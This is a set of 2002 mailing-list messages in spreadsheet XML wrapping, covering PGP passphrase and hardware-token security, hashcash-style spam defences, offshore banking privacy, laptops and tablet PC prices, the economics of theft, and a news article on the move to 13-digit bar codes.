&gt;keyring in clearIf you have a rogue app on your machine, what
keeps it from sniffing your passphrase? This is
one of the reasons I keep harping on the need for
thin, secure clients.&gt;A passphrase is a (long, secure) password unlocking (decrypting) your 
&gt;keyring. You don't use a passphrase to read your email.When I read email, I want to respond to email,
which means, were I using a digital signature,
that it needs to be at the ready.
_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: 
http://photos.msn.com/support/worldwide.aspxhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
--- begin forwarded text
Date: Sun, 11 Aug 2002 13:02:48 +0100
To: usual@espace.net
From: Fearghas McKay 
Subject: Fwd: [camram-spam] another framework hashcash related framework
Reply-To: "Usual People List" 
Sender: 
--- begin forwarded text
Mailing-List: contact camram-spam-help@camram.org; run by ezmlm
X-No-Archive: yes
Reply-To: camram-spam@camram.org
Delivered-To: mailing list camram-spam@camram.org
Delivered-To: moderator for camram-spam@camram.org
Date: Fri, 2 Aug 2002 00:42:53 +0100
From: Adam Back 
To: CAMRAM 
Cc: Adam Back 
Subject: [camram-spam] another framework hashcash related frameworkThere is a framework for using a hashcash like proof of work function
as a way to frustrate junk mailers in this paper:"Curbing Junk E-Mail via Secure Classification"by E. Gabber, M. Jakobsson, Y. Matias, A. Mayer Bellin FC98.Online copy here:http://citeseer.nj.nec.com/27735.html(Look in the view or download section at the top right, it's
availabile in at least .pdf and .ps formats).The framework they propose with proxies etc looks a lot like the
current camram architecture, with a proof of work to get on a white
list.  They use target revokable email addresses (basically identical
to the LWPA concept) to implement the white list.The resulting framework is essentially identical to what I proposed in
recent message with:Subject: target revokable email addresses, and postage-free tokensTheir idea of including the postage free-token in the email address,
mirrors what is done in LWPA and makes the system exhibit smoother
migration for non-users.  eg. you can use varied sender addresses and
it will still work, you can forward the email address to someone else
and it will still work etc.They have some software architecture diagrams and suggestions for
installing some of the proxies on a corporate gateway -- "gatekeeper"
they call it.Adam---------------------------------------------------------------------
To unsubscribe, e-mail: camram-spam-unsubscribe@camram.org
For additional commands, e-mail: camram-spam-help@camram.org--- end forwarded text---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</si>
  <si>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
--- begin forwarded text
Date: Sun, 11 Aug 2002 03:33:37 -0400
To: 
From: "R. A. Hettinga" 
Subject: Re: [dgc.chat] free?
Cc: Digital Bearer Settlement List 
Reply-To: 
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1At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credit-card and securities clearing, or the odd governmental or
quango re-org, like they are wont to do increasingly in the EU, and
the US.As a result, the veil of secrecy went in Switzerland quite a while
ago. The recent holocaust deposit thing was just the bride and groom
on that particular wedding-cake, and, as goes Switzerland, so goes
Luxembourg, and of course Lichtenstein, which itself is usually
accessible only through Switzerland. Finally, of course, the Caymans
themselves will cough up depositor lists whenever Uncle comes calling
about one thing or another on an increasingly longer list of fishing
pretexts.At this point, the "legal", state-backed pecuniary privacy pickings
are kind of thin on the ground. I mean, I'm not sure I'd like to keep
my money in, say, Vanuatu. Would you? Remember, this is a place where
a bandana hanging on a string across an otherwise public road will
close it down until the local erst-cannibal hunter-gatherer turned
statutorily-permanent landowner figures out just what his new or
imagined property rights are this afternoon.
The point is, any cypherpunk worth his salt will tell you that only
solution to financial or any other, privacy, is to make private
transactions on the net, cheaper, and more secure, than "transparent"
transactions currently are in meatspace. Then things get *real*
interesting, and financial privacy -- and considerably more personal
freedom -- will just be the icing on the wedding cake. Bride and
groom action figures sold separately, of course.Cheers,
RAH
(Who went to FC2K at the Grand Cayman Marriott in February that year.
Nice place, I liked Anguilla better though, at least at the time, and
I haven't been back to either since. The beaches are certainly better
in Anguilla, and the "private" banking system there is probably just
as porous as Cayman's is, by this point. If I were to pick up and
move Somewhere Free outside Your Friendly Neighborhood Unipolar
Superpower, New Zealand is somewhere near the top of my list, and
Chile would be next, though things change quickly out there in
ballistic-missile flyover country. In that vein, who knows, maybe
we're in for some kind of latter-day Peloponnesian irony, and
*Russia* will end up the freest place on earth someday. Stranger
things have happened in the last couple of decades, yes?)-----BEGIN PGP SIGNATURE-----
Version: PGP 7.5iQA/AwUBPVYS48PxH8jf3ohaEQKwtgCgw/XSwzauabEP/8jDvUVk/rgFdroAn0xf
Owk90GoK+X5Pv+bGoKXCwzBK
=1w9d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subscribe: send blank email to dgcchat-join@lists.goldmoney.com
unsubscribe: send blank email to dgcchat-leave@lists.goldmoney.com
digest: send an email to dgcchat-request@lists.goldmoney.com
with "set yourname@yourdomain.com digest=on" in the message body---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</si>
  <si>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Hello Eugen,
EL&gt; I believe I mentioned users can't be bothered to enter passphrases. That's
EL&gt; what tokens are there for. At some point we can expect a convenient USB
EL&gt; port on the keyboard,You mean like on mac keyboards :-)    Or laptops (which are as damn
near close to keyboard/usb connection as one can get, without the real
thing)Sorry, couldn't help myself.
-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 11 Aug 2002, Russell Turpin wrote:&gt; If you have a rogue app on your machine, what keeps it from sniffing
&gt; your passphrase? This is one of the reasons I keep harping on the needAs long as the OS doesn't give you a convenient GetPassPhrase() method 
that threat model is theoretical. Worms are autonomous, and autonomous 
worms are not that smart.However, that's the reason I mentioned crypto hardware (USB fobs, smart 
cards, etc).&gt; for thin, secure clients.While this is a good idea, the concept of security is holistic. It 
involves a secure OS, secure apps, and crypto hardware. 
&gt; When I read email, I want to respond to email, which means, were I
&gt; using a digital signature, that it needs to be at the ready.I believe I mentioned users can't be bothered to enter passphrases. That's
what tokens are there for. At some point we can expect a convenient USB
port on the keyboard, or the video device front. Meanwhile, my Net PC 
server sitting by the CRT with front USB ports will do.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 11 Aug 2002 bitbitch@magnesium.net wrote:&gt; You mean like on mac keyboards :-)    Or laptops (which are as damnYeah, I was thinking of the G4 keyboard when I wrote this. Otherwise lousy
feel and key placement, though. (That's why I'm holding on to my IBM Model
M Space Saver. Once I get an PS2 to USB converter, I expect it will
outlive several generations of computer hardware).Very good for sticking in USB fobs into, though. CRTs/LCD panels are even 
better for that, though.&gt; near close to keyboard/usb connection as one can get, without the real
&gt; thing)I think laptops are largely useless because of the battery and the 
keyboard issue.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello Eugen,Sunday, August 11, 2002, 2:54:10 PM, you wrote:EL&gt; On Sun, 11 Aug 2002 bitbitch@magnesium.net wrote:&gt;&gt; You mean like on mac keyboards :-)    Or laptops (which are as damnEL&gt; Yeah, I was thinking of the G4 keyboard when I wrote this. Otherwise lousy
EL&gt; feel and key placement, though. (That's why I'm holding on to my IBM Model
EL&gt; M Space Saver. Once I get an PS2 to USB converter, I expect it will
EL&gt; outlive several generations of computer hardware).EL&gt; Very good for sticking in USB fobs into, though. CRTs/LCD panels are even 
EL&gt; better for that, though.&gt;&gt; near close to keyboard/usb connection as one can get, without the real
&gt;&gt; thing)EL&gt; I think laptops are largely useless because of the battery and the 
EL&gt; keyboard issue.EL&gt; http://xent.com/mailman/listinfo/forkDunno.. Some of the new Sonys (I'm hunting again for a lappy, as the
Toshiba I have is a large piece of cow manure)  which promise a 4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can't imagine surviving at Law school without a
lappy, but thats just me.then again, I don't know what you do with your laptops, Gene :)-- 
Best regards,
 bitbitch                            mailto:bitbitch@magnesium.net
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1On Sun, 11 Aug 2002, Gordon Mohr wrote:&gt; &gt; Users don't like entering passphrases when sending email. USB fobs, smart 
&gt; &gt; cards or other removable hardware are not yet widespread.
&gt; 
&gt; Bad assumption.Not really. If code can sign stuff without me being aware of it that
pretty much invalidates the (already tenuous, since it assumes me trusting
the contents of the frame buffer) concept of a digital signature.A secure piece of hardware puts the keyring outside of any code's reach.  
The key never leaves the hardware compartment. I have to mechanically
acknowledge a signing process. The cryto fob then falls back to the
default state: locked.
&gt; A reasonable UI would have me enter my passphrase *at most* each 
&gt; time I launch my mail program -- never more than once per day,
&gt; sometimes once per week. I'm pretty comfortable with entering my passphrase every time. This is not 
production key, as I usually access my home box via a SSH session, and SSH 
sessions are easily attackable with a model of your typing pattern. So 
don't expect me to announce my plutonium shipments via this medium.
&gt; For some of myy workstations, I'd even be happy with the necessary
&gt; signing key being cached on disk, so signing is automatic when I
&gt; hit 'send'.
&gt; 
&gt; If spammer code can read my local hard disk, I have bigger problems
&gt; than spoofed spam.I agree. Nevertheless, a number of people who use cryptography have their 
machines compromised. 
- -- Eugen* Leitl leitl
______________________________________________________________
ICBMTO: N48 04'14.8'' E11 36'41.2'' http://leitl.org
83E5CA02: EDE4 7193 0833 A96B 07A7  1A88 AA58 0E89 83E5 CA02
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.orgiD8DBQE9VtLFqlgOiYPlygIRAlRGAJ9MbPmjQESIqXD0g43aVgsLFcESSQCePf8x
smDzFndB40MbQMv0l3yzMoY=
=acss
-----END PGP SIGNATURE-----http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Eugen Leitl writes:
&gt; On Sun, 11 Aug 2002, Gordon Mohr wrote:
&gt; 
&gt; &gt; If you crypto-sign your outgoing mail, you don't have to set your
&gt; &gt; mailwall whitelist to accept unsigned mail spoofed as being from you.
&gt; 
&gt; Users don't like entering passphrases when sending email. USB fobs, smart 
&gt; cards or other removable hardware are not yet widespread.Bad assumption.A reasonable UI would have me enter my passphrase *at most* each 
time I launch my mail program -- never more than once per day,
sometimes once per week. For some of myy workstations, I'd even be happy with the necessary
signing key being cached on disk, so signing is automatic when I
hit 'send'.If spammer code can read my local hard disk, I have bigger problems
than spoofed spam.- Gordon
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1Gordon Mohr wrote:
&gt; Eugen Leitl writes:
&gt; 
&gt;&gt;On Sun, 11 Aug 2002, Gordon Mohr wrote:
&gt;&gt;
&gt;&gt;&gt;If you crypto-sign your outgoing mail, you don't have to set your
&gt;&gt;&gt;mailwall whitelist to accept unsigned mail spoofed as being from you.Yup, I've been meaning to cobble together procmail + script for this, as 
a few Google searches didn't turn up anything. Did anyone here get there 
first?(I guess I want a config file of mailboxes who normally sign their mail, 
and procmail that runs gpg and adds headers...)&gt;&gt;Users don't like entering passphrases when sending email. USB fobs, smart 
&gt;&gt;cards or other removable hardware are not yet widespread.
&gt; 
&gt; Bad assumption.
&gt; 
&gt; A reasonable UI would have me enter my passphrase *at most* each 
&gt; time I launch my mail program -- never more than once per day,
&gt; sometimes once per week. FWIW, the 'Enigmail' add-on for Mozilla's mail client has it happily 
talking to GPG (and I believe PGP). You can choose how long it remembers 
your passphrase for, default is 15 mins.see http://enigmail.mozdev.org/This feature was enough to get my off my Pine habit, since (to answer 
the original question) the combination of SpamAssassin and shared 
whitelists means that forged 'From:' headers are pretty much the only 
spam I see in my inbox now.Dan
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.orgiD8DBQE9VvAyPhXvL3Mij+QRAkDdAJ4m/LO7Y0aki66H5AIwbmsX8Q/PegCfSQgI
ZW2XmlcnQtrzALPimthvlr8=
=wdf/
-----END PGP SIGNATURE-----http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; You mean like on mac keyboards :-)Or any of the Microsoft USB keyboards.  I've an MS Internet Pro unit with two
ports off it's hub.I've considered using the 64mb flash unit in one of them as storage for keys.
Unfortunately the KVM switching would drive the client programs crazy when
switching between the machines.-Bill Kearney
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&amp;&gt; EL&gt; Yeah, I was thinking of the G4 keyboard when I wrote this. Otherwise ousy 
&amp;&gt; EL&gt; feel and key placement, though. (That's why I'm holding on to
&amp;&gt; EL&gt; My IBM Model M Space Saver. Once I get an PS2 to USB converter, I
&amp;&gt; EL&gt; expect it will outlive several generations of computer hardware).The Fingerworks dvorty ergo keyboards are pretty good for that; unfold, plug
the USB port and go, but you don't get the angle unless you put the castiron
(sort of) bracket (and optional gel palm-rests) in your pack.  Big airport fun there.
The flexi-PCB connecting the halves is probably only good for 100,000 flexes too.
(The keyboard is $200-400, hence minor concern.)Kind of useless for keysigning though; is it not law that when you have to sign,
you will be packed and ready to leave/arrive elsewhere?  Thats why F-u-F-mi
is such a handy accessible proxy signing method and Dragon Naturally
Authorized canceled its IPO.
	Seriously, the nifty Palm thing where you enter your password
and (or by) a series of naturally cryptic buttonpressed and screentaps is a
good method.  Keyed steganography (&lt;---bad term! sorry) is it until I
hear more about spoofed braille.[the below digresses to laptopianism]&amp;&gt; EL&gt; Very good for sticking in USB fobs into, though. CRTs/LCD panels are
 even &amp;&gt; EL&gt; better for that, though.The DPMS connector is supposed to do -what- again?
&amp;&gt; &gt;&gt; near close to keyboard/usb connection as one can get, without the real
&amp;&gt; &gt;&gt; thing)&amp;&gt; EL&gt; I think laptops are largely useless because of the battery and the
&amp;&gt; EL&gt; keyboard issue.Once you get something to cut the backlight power low when not needed for
image proofing (or off, in case of FLCD) and cache CDs as virtual devices,
is battery life still bad?&amp;&gt; Dunno.. Some of the new Sonys (I'm hunting again for a lappy, as the
&amp;&gt; Toshiba I have is a large piece of cow manure)  which promise a 4 hour
&amp;&gt; battery life off of ONE battery are pretty damn impressive.  As far as
&amp;&gt; the keyboard issue, the Toshiba actually came out with a good
&amp;&gt; keyboard, nearly equivalent to most standard keyboards (Not ergonomic,
&amp;&gt; alas, but I have a USB happy ergo keyboard I can always plug in if I
&amp;&gt; get restless).   I can't imagine surviving at Law school without a
&amp;&gt; lappy, but thats just me.Once used to being surrounded by lawyers with webcams,
I cant imagine being flummoxed dealing with courts.Lots of the tabletPCs have daylight readable FLCDs.  (From looking
at http://www.infocater.com  I don't know where you'll get Microsoft 
Tablet OS though.)   An item from their handy pres. below.
So after looking at Transmetazone, tell me where (also) stateside I'm 
supposed to be\ shopping for the new Made-for-Japan laptops?The Sony U series is all Crusoe, but then TigerDirect will be all grins
to sell you a lappad that gets you to 10h on a P4m...maybe a P4, who's to
say Tulatin P4s can't do that massive multithreading trick.
(Besides which, a brown cowpie-colored Dell 8200 with a 
GeForce4Go400-32 is ca. $1550, before you buy car adapters 
and firewire drives.  Popular in OpenGL law school.)Revamping the Sony C1 every year strikes me as a cruel joke though,
and I don't know any tricks for using 1400x2800 virtual screens on
the lovely NEC LaVie MX and Versa Daylite (FLCDs, 1 yr old) or
Toshiba Libretto L5/080 knkw (the KW has 802.11b built in, maybe
not as good as the 22MBps version or .a)&amp;&gt; then again, I don't know what you do with your laptops, Gene :)
----8&lt; ---ancillary.bar: disclaimer: Before the dollar fell below the euro.
 Return-Path:   
Dear Steve,Thank you for your inquiry regarding the Tablet PC's. InfoCater is a Tablet Computer Value Added Reseller and Systems Integrator that specializes in wireless tablet computers. We provide:&gt; hardware selection expertise
&gt; software application evaluation, specification, implementation and delivery
&gt; extensive hands-on experience with all forms of touch screen and Tablet Computers.We work with you the way you prefer. We will listen to your needs, recommend the appropriate tablet, accessories and software, and be available to assist you as desired to make your project a success! Our services include product selection, consulting, training, implementation and custom development. We carry the complete line of Tablet PC's tablets and accessories.We have software solutions that you may find interesting, and even have Bluetooth products to eliminate cables to printers, mobile phones, bar code scanners, and other devices.Please let us know your exact specifications and the environment you will be using your tablets.Please visit http://www.infocater.com and select "specs" at the top of the page for more information and PDF files on our products and services.Some other details:Communicating:We strive to make it easy for you to communicate with is, using whatever method you prefer.Phone: You can call me at 617.969.6853 anytime it's convenient for you and we can discuss further. If you get a voice mail message, we apologize and if you leave your phone number and a convenient time to return the call we will get back to you as soon as possible. Email:Email also works well. Please Email gpalmer@infocater.com Shipping:The Tablet PC's and accessories are available for same day shipping. If you require a custom configuration, it will take a few weeks to get built to your specification. The shipping charges are based on the speed of service that you require. We insure all shipmentsPayment: We accept payment by credit card, purchase order or wire transfer, as you prefer. We look forward to working with you and serving your tablet computer needs.
Regards,
Geoff
Geoffrey Palmer
President
InfoCater, Inc. 14 Buswell Park
Newton, MA 02458Email: gpalmer@infocater.com 
WWW: http://www.infocater.comPhone: 617-969-6853
Fax: 508-448-8375 
IM: Yahoo: infocater AOL: infocaterinc --------------------------------------------------------------------------------------------------------------------------------------------
Product Information:ViewSonic ViewPad 1000 Tablet PC - SAME DAY SHIPPING AVAILABLEThe ViewPad 1000 is a full function PC featuring a 10.0 GB hard drive, an 800 MHz Intel Celeron processor and Microsoft Windows 2000 Professional operating system, all in an easy-to-use tablet design. Built for connectivity, the ViewPad 1000 come equipped with built-in WAN, LAN, and WiFi (802.11b) wireless LAN connectivity, giving users network access in nearly any environment. This innovative device gives users mobile access to information, captures, sends and receives live images (it's got a built-in digital camera), and shares information of all kinds for a rich multimedia viewing experience. The 10.4 inch high-resolution touch screen makes for easy navigation with the touch of a finger or stylus. Accessories such as a docking station are also available. The price for the Microsoft Windows 2000 Professional based ViewSonic ViewPad 1000 is $1975. The optional docking station costs $299.Microsoft Internet Explorer 5.0, Microsoft Outlook Express, Microsoft NetMeeting, Microsoft Windows Media player, Adobe Acrobat Reader, handwriting recognition and a virtual keyboard are included.The unit has an 10.4 inch 800 x 600 High Luminance SVGA resistive touch screen display that can be used either in portrait or landscape mode, 128 MB RAM (expandable to 512MB), a 10 GB hard disk drive, two USB ports, an open type II PCMCIA slot, an infrared wireless keyboard port (keyboard included) and an infrared data port. In addition, a VGA port is available for an external monitor at up to 1024x768. The ViewPad 1000 is powered by a 800 MHz Intel Mobile Celeron.--------------------------------------------------------------------------------------------------------------------------------------------
Fujitsu Stylistic 3500 and LT-P600: The Fujitsu Stylistic 3500 and LT-P600 products are available in several configurations depending on disk, screen, memory capacity and wireless options. The prices range from $3559 to $3859 and offer the choice of Windows 2000 or Windows 98. The screen options include models for indoor, outdoor or both indoor and outdoor use. Screen resolution options are 800x600 or 1024x768. These products are built to your specific configuration and usually take about two weeks to deliver. --------------------------------------------------------------------------------------------------------------------------------------------
ViewSonic ViewPad 100 Super PDA - SAME DAY SHIPPING AVAILABLEThe ViewPad 100 Super PDA enables you to access important applications and data from virtually anywhere. Not only is information easy to get (with options added to the included PC Card and CompactFlash slots), but it's also easy to keep organized by synchronizing the ViewPad 100 to a PC. You can also access server-based applications remotely with the provided Citrix ICA or Microsoft's RDP software. The price for the Microsoft Windows CE 3.0 based ViewSonic ViewPad 100 is $1225. The cradle is an additional $129. The unit features a PCMCIA slot and a CF slot which enable you to insert either a 802.11b WLAN card or a cellular based WAN card (not included).Internet Explorer 4.0 with Java Virtual Machine and Macromedia Flash support are included, as are viewers for many types of files, PTab Spreadsheet software (Microsoft Excel compatible), Citrix ICA 6.0 and Microsoft RDP 5.0, Microsoft Inbox, Microsoft Pocket Word, PowerPoint, Pocket On-Schedule and Primer PDF Viewer. The unit features Microsoft ActiveSync, handwriting recognition software, and a virtual keyboard.The unit has an 10 inch 800 x 600 High Luminance SVGA resistive touch screen display that can be used either in portrait or landscape mode, 128 MB RAM and 32MB Flash, one USB port, an open type II PCMCIA slot and an open type II CompactFlash slot . In addition, a VGA port is available for an external monitor at up to 1024x768. The ViewPad 100 is powered by a 206 MHz Intel StrongARM SA-1110.--------------------------------------------------------------------------------------------------------------------------------------------
Honeywell WebPAD II - SAME DAY SHIPPING AVAILABLEThe Honeywell WebPad II is an information appliance with wireless high speed connection to the Internet that enables you to surf the web, send and receive email, and enter information via a pop-up touch screen keyboard. The price for the Microsoft Windows CE 3.0 based Honeywell WebPad II with integrated 802.11b wireless card, cradle and power supply is $1625. Microsoft Internet Explorer 4.0 with Java Virtual Machine and Macromedia Flash support are included, as are viewers for many types of files, Citrix ICA and Microsoft RDP, Microsoft Windows Media player, Microsoft Inbox and Microsoft Pocket Word. The unit has an 10 inch 800 x 600 TFT active matrix touch screen SVGA display with pop-up keyboard, 64 MB RAM and 32MB Flash, one USB port and an open type II CompactFlash slot. The unit is powered by a National Semiconductor 300 MHz Geode GS1 processor. If you do not have an 802.11b access point, I recommend the Dlink DI-713P which costs $250.--------------------------------------------------------------------------------------------------------------------------------------------
FIC AquaPAD - SAME DAY SHIPPING AVAILABLEAquaPAD combines the functionality and power of a cumbersome notebook with the convenience and simplicity of a PDA. This compact handheld Internet appliance offers high-speed wireless Internet access and can communicate with BluetoothÂ™-enabled devices. With its two USB inputs, a PCMCIA Type II slot, and a Compact Flash slot, there is truly no limit to AquaPAD's functionality. Additionally, AquaPAD comes loaded with WindowsÂ® CE and a full suite of utilities, including MS Word. The AquaPAD features a complete, highly rich, multimedia capability. With AquaPAD, the ability to surf the web, read a book, listen to a MP3, or watch a MPEG movie is right in the palm of your hand-literally!Whether you need to access a local network or the Internet, the AquaPAD is the only solution to provide the power and capability to harness all the possibilities of wireless.When it comes to performance, the AquaPAD takes no prisoners. The AquaPAD offers an incredibly fast 500MHz Transmeta Crusoe 5400 processor coupled with 128MB of SDRAM memory-so you'll have all the power you need. Plus, with the Crusoe's special energy saving design, you'll enjoy up to 3+ hours of battery life. The AquaPAD comes loaded with MS WindowsÂ® CE -and all of the functionality that comes with them. Plus, with our suite of utilities, the AquaPAD is immediately ready to get down to business.Windows CE 3.0, Windows 2000*, Windows Me* and Linux versions available!The FIC AquaPAD is $1,399 with a Cisco 802.11b wireless card with your choice of CE or Linux.* Optional IBM 1GB Microdrive required for Windows 2000 ($499) or Windows Me($399).Spare batteries are $139, and a cradle that can charge both the AquaPAD and a second battery is $79.--------------------------------------------------------------------------------------------------------------------------------------------
Siemens SIMpad SL4 - SAME DAY SHIPPING AVAILABLEThe Siemens SIMpad SL4 includes a brilliant color TFT touchscreen which shows a complete HTML page, recognizes handwriting, is PC Card enabled, uses Windows CE, and links effortlessly and wirelessly in just ten seconds to the web or to your LAN. This ligheweight tablet features an 8.4" TFT touchscreen, SVGA (800 x 600 pixel), 16 bit colors (65536 colors), photo quality display. The proccessor is an Intel StrongARM 1110, 206 MHz 32-bit RISC. There is a PC-Card-Slot, RS-232, IrDA, SmartCard, headset connection and a Li-Ion battery. There is 64MB RAM and 32 MB Flash. The operating system is Microsoft Windows CE 3.0 for Handheld PC 2000. The software included in the standard package is MS Internet Explorer 4.0 for HPC, MS Pocket Outlook (Inbox, Tasks, Calendar, Contacts), MS Pocket Office (Word, Excel, Powerpoint, Access), MS Pocket Paint, Jot handwriting recognition, Java Virtual Machine, Terminal Server Client, Electronic Notebook, Calculator, Games, Macromedia Flash player, Virtual Keyboard. The standard package inclused the SIMpad SL4, AC adapter, power cable, serial cable, stylus pens, software CD-ROM, manuals for $1495, and a cradle with charger is $70.--------------------------------------------------------------------------------------------------------------------------------------------
Fujitsu PenCentra 200: The Fujitsu PenCentra products are available in several configurations depending on the operating system, wireless and screen selections. The prices range from $1500-1600 and offer the choice of Windows CE or Windows CE H/PC 2000. The screen options include models for indoor or outdoor use. Screen resolution is 640x480. These products are built to your specific configuration and usually take about two weeks to deliver. --------------------------------------------------------------------------------------------------------------------------------------------
Advantech MobiPanel 100InfoCater proudly introduces its first ruggedized web tablet, the MobiPanel 100, a portable wireless Windows CE-based appliance combining data capture and communication technology. The MobiPanel 100 is designed to provide mobile professionals a real time wireless solution to access information from remote databases via the Internet or an Intranet. The MobiPanel 100 is ideal for applications in retail, healthcare, warehousing, home networking, manufacturing process monitoring, hospitality, logistic support and on-site service. This is essentially a ruggedized version of the ViewSonic ViewPad 100 with an integrated 802.11 wireless card and antenna.The I/O ports, LCD panel and internal circuitries of the MPC-100 have been designed to resist spill and water damage. The product is dust-resistant with protected LCD, sealed ports and card slots for protection against unexpected accidents and damages. These features have been approved by the IP53 standard.
The I/O ports, LCD panel and internal circuitries of the MPC-100 have been designed to resist spill and water damage. The product is dust-resistant with protected LCD, sealed ports and card slots for protection against unexpected accidents and damages. These features have been approved by the IP53 standard. 
http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "D" == Damien Morton  writes:    D&gt; An alternative, which I have found very effective in reducing
    D&gt; my spam levels, is to reject emails to multiple or undisclosed
    D&gt; recipients, unless from someone in my whitelist (In this case,
    D&gt; subscribed members).I often use just such a posting to send emails to lists but also to
send them to private individuals who need not be publically exposed on
the list. This is what BCC is for.Where my spam filter draws the line is for emails which /only/ have
undisclosed recipients, or an obviously bogus recipient.-- 
Gary Lawrence Murphy  TeleDynamics Communications Inc
Business Innovations Through Open Source Systems: http://www.teledyn.com
"Computers are useless.  They can only give you answers."(Pablo Picasso)http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">The case against theft also acknowledges that the value to the thief is
often far less than the value to the victim.  Stealing my $1,000 sterio
and then fencing it for $50 does not result in 'no loss' the the economy
overall.  For the same reason that voluntary transactions increase
social value, involuntary ones decrease it.  If the sterio was worth as
much to the theif as it was to me he'd buy it ...On the flip side of this, common law allows a breach of property law in
precisely the type of scenarios where a net social gain is recorded but
the owner's availability to make a contract was problematic.  Breaking
into your isolated cabin because I'm starving, for example, is
permissible if I later offer restitution for the damage I caused and the
food I ate.&gt; -----Original Message-----
&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
&gt; Russell Turpin
&gt; Sent: Saturday, August 10, 2002 6:25 AM
&gt; To: fork@spamassassin.taint.org
&gt; Subject: Re: David Friedman: Mail Me the Money!
&gt; 
&gt; R. A. Hettinga:
&gt; &gt;..which reminds me of my favorite David Friedman quote. "The direct
use
&gt; of
&gt; &gt;physical force is so poor a solution to the problem of limited
resources
&gt; &gt;that it is commonly employed only by small children and great
nations."
&gt; 
&gt; Is that relevent here? The spam problem, like
&gt; the fraud and the robbery problem, is about people
&gt; who will do whatever it takes to make a buck, no
&gt; matter how much harm they do to others in the
&gt; process.
&gt; 
&gt; From an economist's viewpoint, the downside of
&gt; theft is not that it transfers property from one
&gt; person to another, which is no loss to the economy
&gt; overall, but that defending against it is an
&gt; additional expense simply to enjoy what you
&gt; have already acquired.http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">
As a practical matter, I doubt the value sold in such situations ever
adds up to the value lost.  And the non-pecuiary since of violation,
loss, and trouble has to get in there somewhere if we are really picky.I don't think considering marginal utility of dollars has value in this
situation.  We aren't debating whether the thief is better off -- he is.I'm not a lawyer either.  I played one on TV once but I didn't play a
very good one and they canceled it after the first episode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around).Maybe I did get it all wrong, but that particular recollection is
relatively strong precisely because it gave a good reason why my
libertarian theology needed to be modified.He was also analyzing what the common law had come up with, which might
not be the statuatory law in a particular jurisdiction.&gt;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http://xent.com/mailman/listinfo/forkhttp://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">This article from NYTimes.com 
has been sent to you by khare@alumni.caltech.edu.
Let's see... a decimal digit is about 3.33 bits, so this is all about moving from a 36-bit to a 46-bit addressing system. Kind of makes the debate about IPv6 spaces quite real, as well as the Auto-ID center at MIT's proposal for a physical markup language. Actual barcode size may yet decline to the point that 2-D codes may yet make it an individual-item level of addressing.Seeing software systems this fantastically brittle after fifty years is not, unfortunately, surprising. Are we sure we really know better yet? Are angle brackets really the key to immortality? :-&gt;Interesting reinforcement of the Voyager piece I archived earlier today... RKkhare@alumni.caltech.edu
Bigger Bar Code Inches Up on RetailersAugust 12, 2002
By KATE MURPHY 
 In a little more than two years, retailers in the United
States and Canada will face a deadline that promises
technological challenges akin to the Year 2000 computer
problem. Starting Jan. 1, 2005, the 12-digit bar codes retailers use
to identify everything from cars to candy bars will go to
13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Wal-Mart Stores, the world's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everybody's still in the assessment phase, trying
to figure out what to do." The difficulty is similar to the one posed by the Year 2000
computer problem, when computer software had to be switched
from two-digit entries identifying years to four-digit
entries. Before Jan. 1, 2000, millions of lines of code had
to be rewritten to avoid widespread computer failures. Bar codes have been used in packaging since 1974, when the
first item, a pack of chewing gum, was scanned at a
supermarket in Ohio. The codes identify a product,
distinguishing between an eight-ounce can of Del Monte
creamed corn and a medium-size pair of Hanes boxer shorts.
When a bar code is scanned, the information in the store's
database lets the retailer assign a price and track sales
and inventory. "The bar code is the linchpin upon which everything in
retail depends," Mr. Friedman said. The reason for expanding the 12-digit bar code, known as
the Universal Product Code, is twofold. First, there is a
shortage of U.P.C. numbers. "There's only a certain amount
of 12-digit numbers, and we're going to run out," said John
Terwilliger, vice president of global markets at the
Universal Code Council, a nonprofit organization based in
Lawrenceville, N.J., that assigns codes in the United
States and Canada. Second, 13-digit bar codes are used
almost everywhere else in the world. The council's European
counterpart, EAN International, based in Brussels, assigns
these numbers, called European Article Numbers, to
companies in 99 nations. "Right now," Mr. Terwilliger said,
"foreign importers have to get a 12-digit U.P.C. to do
business over here, which they haven't been too happy
about." Foreign manufacturers currently pass on to consumers the
cost of getting an additional bar code and creating special
labels for products sold in the United States and Canada.
"It's an added expense for them, and they have to recoup it
somewhere," said Debra Shimkus, marketing manager at the
Chicago Importing Company, a specialty food importer whose
overseas suppliers are often incredulous when they are told
they have to get new bar codes for their products before
they can be sold in American groceries. Many foreign manufacturers decide that it is not worth the
trouble. "A lot of companies have been unwilling to accept
the additional burden," Mr. Terwilliger said, "and have
stayed out of the market entirely." American and Canadian exporters have not had the same
obstacle because foreign retailers can easily incorporate a
12-digit number into their 13-digit databases by making the
first digit zero. That is why American and Canadian
manufacturers of products that now have 12-digit codes will
not be affected by the code expansion. A two-liter bottle
